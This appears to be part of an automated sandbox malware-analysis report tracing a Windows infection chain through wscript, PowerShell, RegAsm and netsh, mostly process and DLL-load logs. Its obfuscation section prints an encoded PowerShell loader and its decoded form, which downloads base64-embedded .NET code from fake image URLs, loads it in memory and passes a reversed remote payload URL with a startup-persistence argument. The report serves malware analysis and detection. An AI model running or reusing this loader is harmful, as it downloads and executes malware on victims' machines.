Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: netsh.pdb source: RegAsm.exe, 00000006.00000002.1654119281.0000000003030000.00000040.10000000.00040000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.000000000149A000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000002.2654921353.0000000000E30000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: RegAsm.exe, 00000006.00000002.1654119281.0000000003030000.00000040.10000000.00040000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.000000000149A000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2654921353.0000000000E30000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.1656803800.0000000003090000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.1641084267.000000000314E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.1643019869.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.000000000363E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: explorer.exe, 00000007.00000002.2670125824.0000000010F8F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2656472532.00000000039EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2655145082.0000000002F46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000006.00000002.1656803800.0000000003090000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000003.1641084267.000000000314E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.1643019869.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.000000000363E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: explorer.exe, 00000007.00000002.2670125824.0000000010F8F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2656472532.00000000039EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2655145082.0000000002F46000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Network");IWshNetwork2.ComputerName();IWshShell3.Run("powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@", "0")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@
EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@H
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.mApAgbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
